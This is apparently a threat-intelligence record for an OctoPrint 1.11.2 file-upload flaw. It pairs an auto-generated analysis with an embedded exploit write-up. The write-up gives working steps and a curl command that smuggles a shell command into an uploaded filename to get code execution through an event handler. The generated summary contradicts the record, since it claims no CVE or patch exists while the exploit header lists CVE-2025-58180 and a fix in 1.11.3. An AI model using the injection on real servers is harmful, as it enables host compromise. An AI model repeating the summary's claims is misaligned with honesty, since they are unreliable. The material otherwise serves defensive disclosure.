OctoPrint 1.11.2 - File Upload
AI Analysis
Technical Summary
The reported security threat concerns an exploit targeting OctoPrint version 1.11.2, specifically its file upload functionality. OctoPrint is an open-source web interface that enables remote management and control of 3D printers. The exploit likely leverages insufficient input validation or improper handling of uploaded files, which can allow attackers to upload malicious files to the server hosting OctoPrint. Such unauthorized file uploads could enable attackers to execute arbitrary code, modify or sabotage 3D print jobs, or gain further access to the underlying system. Although the exact vulnerability details and affected versions are not fully enumerated, the presence of exploit code (noted as text) suggests that proof-of-concept or working exploit scripts exist. No official patches or CVEs have been linked to this exploit yet, and no active exploitation has been reported in the wild. The exploit is classified as medium severity, reflecting moderate risk due to the potential for unauthorized access and disruption of 3D printing operations. Given OctoPrint's role in managing physical devices, exploitation could have tangible physical consequences beyond typical IT system compromises.
Potential Impact
Organizations using OctoPrint 1.11.2, especially those relying on 3D printing for prototyping, manufacturing, or critical operations, face risks including unauthorized control of printing jobs, potential sabotage or destruction of printed objects, and possible compromise of the host system. Attackers exploiting this vulnerability could disrupt production workflows, cause financial losses, or damage intellectual property. Additionally, if the host system is part of a larger network, lateral movement or further compromise could occur. The impact extends beyond data loss to physical asset manipulation, which is significant in industrial, medical, or research environments where 3D printing is integral. Although no widespread exploitation is reported, the availability of exploit code increases the risk of targeted attacks or opportunistic exploitation by less skilled attackers.
Mitigation Recommendations
To mitigate this threat, organizations should first verify if they are running OctoPrint version 1.11.2 and consider upgrading to a later, patched version once available. In the absence of official patches, administrators should restrict access to the OctoPrint interface using strong authentication mechanisms and network segmentation to limit exposure. Implement strict file upload validation and filtering at the web server or application level to prevent unauthorized file types or sizes. Employ monitoring and logging to detect unusual upload activity or unauthorized access attempts. Additionally, running OctoPrint in a containerized or sandboxed environment can reduce the risk of system-wide compromise. Regularly back up 3D printing configurations and files to enable recovery in case of sabotage. Finally, stay informed about updates from OctoPrint developers and security advisories to apply patches promptly.
Affected Countries
United States, Germany, China, Japan, South Korea, United Kingdom, France, Canada, Australia, Netherlands
Indicators of Compromise
- exploit-code:
# Exploit Title: OctoPrint 1.11.2 - File Upload
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
Technical Details
- Edb Id: 52476
- Has Exploit Code: true
- Code Language: text
Threat ID: 69845ddcf9fa50a62f0fd49c
Added to database: 2/5/2026, 9:07:40 AM
Last enriched: 2/28/2026, 3:03:29 PM
Last updated: 3/22/2026, 8:19:24 AM